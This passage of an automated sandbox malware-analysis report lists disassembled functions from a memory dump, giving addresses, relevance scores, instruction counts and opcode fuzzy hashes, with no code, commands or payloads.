                                                                                                                    Function 00007FFD9B790DA7 Relevance: .3, Instructions: 295COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1988452118.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ffd9b790000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a0d70fb5b5af83570590523059682b219ff9aa9b6416a4bbe4438352667dd295
                                                                                                                    • Instruction ID: 1d03bf934876ec758c242db6168afb87ea0217f0fb9dd72bcd72361eb90e3368
                                                                                                                    • Opcode Fuzzy Hash: a0d70fb5b5af83570590523059682b219ff9aa9b6416a4bbe4438352667dd295
                                                                                                                    • Instruction Fuzzy Hash: 04A1B2B5A19A4D8FEB98DFA8C8657ADBFE1FF59310F0001BAD04DD32E6DA7819018740
                                                                                                                    Function 00007FFD9B793FC1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1988452118.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ffd9b790000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: o
                                                                                                                    • API String ID: 0-252678980
                                                                                                                    • Opcode ID: 7fd4436d3a46b4622161050b81ffc76d3e8da06762522abba1413a6f8484bba4
                                                                                                                    • Instruction ID: d7c2f267eab83b2d6947eeaeddf9f0bbd01c6901ad443d286cebbbffe3adf58f
                                                                                                                    • Opcode Fuzzy Hash: 7fd4436d3a46b4622161050b81ffc76d3e8da06762522abba1413a6f8484bba4
                                                                                                                    • Instruction Fuzzy Hash: D4114F70E0665E8FEB78DF08C8A46EC73B2EB50315F0042FAD51DA62A5CB741E858F44
                                                                                                                    Function 00007FFD9B7908D0 Relevance: .2, Instructions: 177COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1988452118.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ffd9b790000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 05b680fd93d76287e9b2621dc1c5c9f1c9e750eb487630fd2f538649884528a7
                                                                                                                    • Instruction ID: 9ed65798c439927d5531afd3d8d474536fc9893534990ff025eba775287f9696
                                                                                                                    • Opcode Fuzzy Hash: 05b680fd93d76287e9b2621dc1c5c9f1c9e750eb487630fd2f538649884528a7
                                                                                                                    • Instruction Fuzzy Hash: 31517F31A0865D8FDB54EFA8E4A5AFDB7A1FF58314F1406BAE009D71A6DF346841CB80
                                                                                                                    Function 00007FFD9B790960 Relevance: .1, Instructions: 137COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1988452118.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ffd9b790000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6f19a7b7fe388ca19f303ae94fdfd5204f7ab1aaf274b17f1082bc115c2da871
                                                                                                                    • Instruction ID: 0d96323595f87dc083972035d3963c7bdba3760f21d23201cae2aca1092f4b8d
                                                                                                                    • Opcode Fuzzy Hash: 6f19a7b7fe388ca19f303ae94fdfd5204f7ab1aaf274b17f1082bc115c2da871
                                                                                                                    • Instruction Fuzzy Hash: D1412E31E18A1D8FDB58EF98D4A5AEDB7A1FF58315F14017AE41DD32A6CE34A8418B80
                                                                                                                    Function 00007FFD9B790908 Relevance: .1, Instructions: 133COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1988452118.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ffd9b790000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cbe0a5d892fabbf49351ed022126c65e7dc9cdc55302cc444052aab21d4fa32d
                                                                                                                    • Instruction ID: 34ca59513170e02210572ec2d82301e84975b1e929820feb5403b3da8eeb75e0
                                                                                                                    • Opcode Fuzzy Hash: cbe0a5d892fabbf49351ed022126c65e7dc9cdc55302cc444052aab21d4fa32d
                                                                                                                    • Instruction Fuzzy Hash: 44518D30A08A0E9FCF84EF98D494EED7BF1FF58355B150269E419E7260DA34E990CB90
                                                                                                                    Function 00007FFD9B790998 Relevance: .1, Instructions: 113COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1988452118.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ffd9b790000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d7dfae20bb5679585ef660c1cbf2cc607a6530827449672885a075f82cce356a
                                                                                                                    • Instruction ID: 91fa519bed4041a740f3f39c029d8e00c3e8c93ad256cea06027b0f4eeef6c65
                                                                                                                    • Opcode Fuzzy Hash: d7dfae20bb5679585ef660c1cbf2cc607a6530827449672885a075f82cce356a
                                                                                                                    • Instruction Fuzzy Hash: 4D410970A14A5D8FDF98EF98C4A5AEDB7F1FF58315F00017AD409E32A5DA34A841CB40
                                                                                                                    Function 00007FFD9B79705A Relevance: .1, Instructions: 95COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1988452118.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ffd9b790000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 401d4dc315c841195df518d1ea95774fc62968310247b6b49d552e7f7f3440bb
                                                                                                                    • Instruction ID: 806c4d3e8bdb73bb1128e1d3956c7dc4ad4560f1db2fb38793a3e56cd7b41919
                                                                                                                    • Opcode Fuzzy Hash: 401d4dc315c841195df518d1ea95774fc62968310247b6b49d552e7f7f3440bb
                                                                                                                    • Instruction Fuzzy Hash: 7041A870E1AA2D9EEBA4EB58C868AE8B7B1FF59341F5101E5D00DD21B1DA346A818F01
                                                                                                                    Function 00007FFD9B794FB8 Relevance: .1, Instructions: 89COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1988452118.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ffd9b790000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1cfe163691aeec5fecb59351aeb9303cd96ca8868187b140973d15444deda47f
                                                                                                                    • Instruction ID: 35c19015fe053ecd98630a0519f526717564bff8418b26e5ff7c7b0b2e36133d
                                                                                                                    • Opcode Fuzzy Hash: 1cfe163691aeec5fecb59351aeb9303cd96ca8868187b140973d15444deda47f
                                                                                                                    • Instruction Fuzzy Hash: AB31BB74A04A1C8FDFA4DF04C895AE9B3F1FBA5301F1001EAD00EE3664CA759A85CF42
                                                                                                                    Function 00007FFD9B790C25 Relevance: .1, Instructions: 78COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1988452118.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ffd9b790000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8f006d19314ce24bff375d14b4b4d72f6ed7194b1426c9843a7d75179cf11835
                                                                                                                    • Instruction ID: b47714b3efb9d4c24bab8fa8d7e0899907dd90d62c4a87693d44f7cd3db8579f
                                                                                                                    • Opcode Fuzzy Hash: 8f006d19314ce24bff375d14b4b4d72f6ed7194b1426c9843a7d75179cf11835
                                                                                                                    • Instruction Fuzzy Hash: 3E21F836B1E78D4FE72296A8DC211ED7B60EB53311F0646B3C055871F2DA341609C791
                                                                                                                    Function 00007FFD9B7911A2 Relevance: .1, Instructions: 74COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1988452118.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ffd9b790000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d785ced54ef7b6e3a55642ba665ca62b72152ab63d38f7c8e4b8e4cee8685d5e
                                                                                                                    • Instruction ID: ca66cdb5c1014ae724066408ed30242e7338057f942a0ebdcafa39ddf396b1ec
                                                                                                                    • Opcode Fuzzy Hash: d785ced54ef7b6e3a55642ba665ca62b72152ab63d38f7c8e4b8e4cee8685d5e
                                                                                                                    • Instruction Fuzzy Hash: 5F210E71A1491D9FEB94EFA8C8959ADB7F1FF68300F11067AD419D32B1DB34A941CB40
                                                                                                                    Function 00007FFD9B790C38 Relevance: .1, Instructions: 59COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1988452118.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ffd9b790000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6fb6c244b4803b4c6c1dc590e845a8c76520f7c4e88d44e0a45934e4b22ec6b9
                                                                                                                    • Instruction ID: 0d1960439d963d1b32cd928ed66794ac88d49e0fd6d2bd9703576cb3850352c1
                                                                                                                    • Opcode Fuzzy Hash: 6fb6c244b4803b4c6c1dc590e845a8c76520f7c4e88d44e0a45934e4b22ec6b9
                                                                                                                    • Instruction Fuzzy Hash: A2110836B1E78E4EE7129BA4C8252ED7770EB53311F0645B3C061DB2F2DA3826098791
                                                                                                                    Function 00007FFD9B790C40 Relevance: .1, Instructions: 53COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1988452118.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ffd9b790000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 736d39757bf3d17c2d6ae71e8ea2254ecf502b9cda3ebfc1dd40fff187b20cc4
                                                                                                                    • Instruction ID: 6230f406ca5a16c00de766dd552bb15c7ad42ce05067492c9a7cf6b76e0ff6c2
                                                                                                                    • Opcode Fuzzy Hash: 736d39757bf3d17c2d6ae71e8ea2254ecf502b9cda3ebfc1dd40fff187b20cc4
                                                                                                                    • Instruction Fuzzy Hash: 8511E735A1E78D4EE7129B64C8241E97B70EB53310F0545B3C061DB1F2CA382609C751
                                                                                                                    Function 00007FFD9B790C50 Relevance: .0, Instructions: 42COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1988452118.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ffd9b790000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cf4882a6f446f2687abae4dea59481465cb85fc5a0200b6b74c09abcf6d86c7e
                                                                                                                    • Instruction ID: 500df8233c0ac79887f6651217ffd79d747cf7d336954463496f8b8ddce6c6e6
                                                                                                                    • Opcode Fuzzy Hash: cf4882a6f446f2687abae4dea59481465cb85fc5a0200b6b74c09abcf6d86c7e
                                                                                                                    • Instruction Fuzzy Hash: 39018435A1E7CE8EE7129BA488242E97B70EB53310F0546B7D461DB2F6DA386618C741
                                                                                                                    Function 00007FFD9B7906AD Relevance: .0, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1988452118.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ffd9b790000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 673734afaf1676223e67c79e4b473cbe82efedb11b0f48ae3a41e3e1da2404ab
                                                                                                                    • Instruction ID: 8672961a460bf8490f4e764fbcc55c95716a90b5d8cdd90e2956a23cef6d6641
                                                                                                                    • Opcode Fuzzy Hash: 673734afaf1676223e67c79e4b473cbe82efedb11b0f48ae3a41e3e1da2404ab
                                                                                                                    • Instruction Fuzzy Hash: 88F09031A1664E8FEB90EF98D4086EE7BA0FF54300F110136E80CC21B0CA3066A08B80
                                                                                                                    Function 00007FFD9B7913E0 Relevance: .0, Instructions: 33COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1988452118.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ffd9b790000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: d50a2aa33825cc43de49f4a873f56a40b27cdd7e99e9361947063752d5528c77
                                                                                                                    • Instruction ID: f3a4dee726a0f0a8687c39e7f4ec1ad8917b9aba223325ad535521ab4c59bc3f
                                                                                                                    • Opcode Fuzzy Hash: d50a2aa33825cc43de49f4a873f56a40b27cdd7e99e9361947063752d5528c77
                                                                                                                    • Instruction Fuzzy Hash: 84F0BD70914A4D9FDF94EF58D848EAA7BE0FF28305F1105A5F81CD3264D630E590CB81
                                                                                                                    Function 00007FFD9B7906D0 Relevance: .0, Instructions: 30COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1988452118.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ffd9b790000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c29d46083d4f18f5c1a459e6933384b5b004af1c9e4654c1882e2379589b5666
                                                                                                                    • Instruction ID: 40f33f220d03ee4b7d1c638ac2e600b47c4fcdd94bb4125aa075a870e1b4842a
                                                                                                                    • Opcode Fuzzy Hash: c29d46083d4f18f5c1a459e6933384b5b004af1c9e4654c1882e2379589b5666
                                                                                                                    • Instruction Fuzzy Hash: FCF0123091564E9FEF90EFA4D4496EA7BF1FF14305F514566E81CD2160DA30A6A0CB80
                                                                                                                    Function 00007FFD9B7966D2 Relevance: .0, Instructions: 27COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1988452118.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ffd9b790000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 176f32b092650aaa9c03085f6199232841bd254698e5009ef9b55d3b40f0cc9c
                                                                                                                    • Instruction ID: a7c7ecccc9c12c6fc2d4e9ccb01808808fc5fadbd7016def03e95e90e03ab724
                                                                                                                    • Opcode Fuzzy Hash: 176f32b092650aaa9c03085f6199232841bd254698e5009ef9b55d3b40f0cc9c
                                                                                                                    • Instruction Fuzzy Hash: 75F06670E4AA2D8EEBB4DA54DC597E9B3B1EB54312F1151EAC00DA22A1DE741A809F01

                                                                                                                    Non-executed Functions

                                                                                                                    Function 00007FFD9B7909B0 Relevance: 5.2, Strings: 4, Instructions: 182COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.1988452118.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_7ffd9b790000_kahKUDRlEYHfKIalWlM.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                                                    • API String ID: 0-1692736845
                                                                                                                    • Opcode ID: 2a71df660a6692d9bae6a6389cf450197cfdbcf09e8db84297ad9b385b7fc575
                                                                                                                    • Instruction ID: d4e4eddf6ca73fcade58325f3f8abf08458e07c4a04d97cfee1e99e4e22b3c7f
                                                                                                                    • Opcode Fuzzy Hash: 2a71df660a6692d9bae6a6389cf450197cfdbcf09e8db84297ad9b385b7fc575
                                                                                                                    • Instruction Fuzzy Hash: A851F20BF9D52709E21A32FC75228FD6B46DFA1379B0843B3F05E890EB4E09608686D5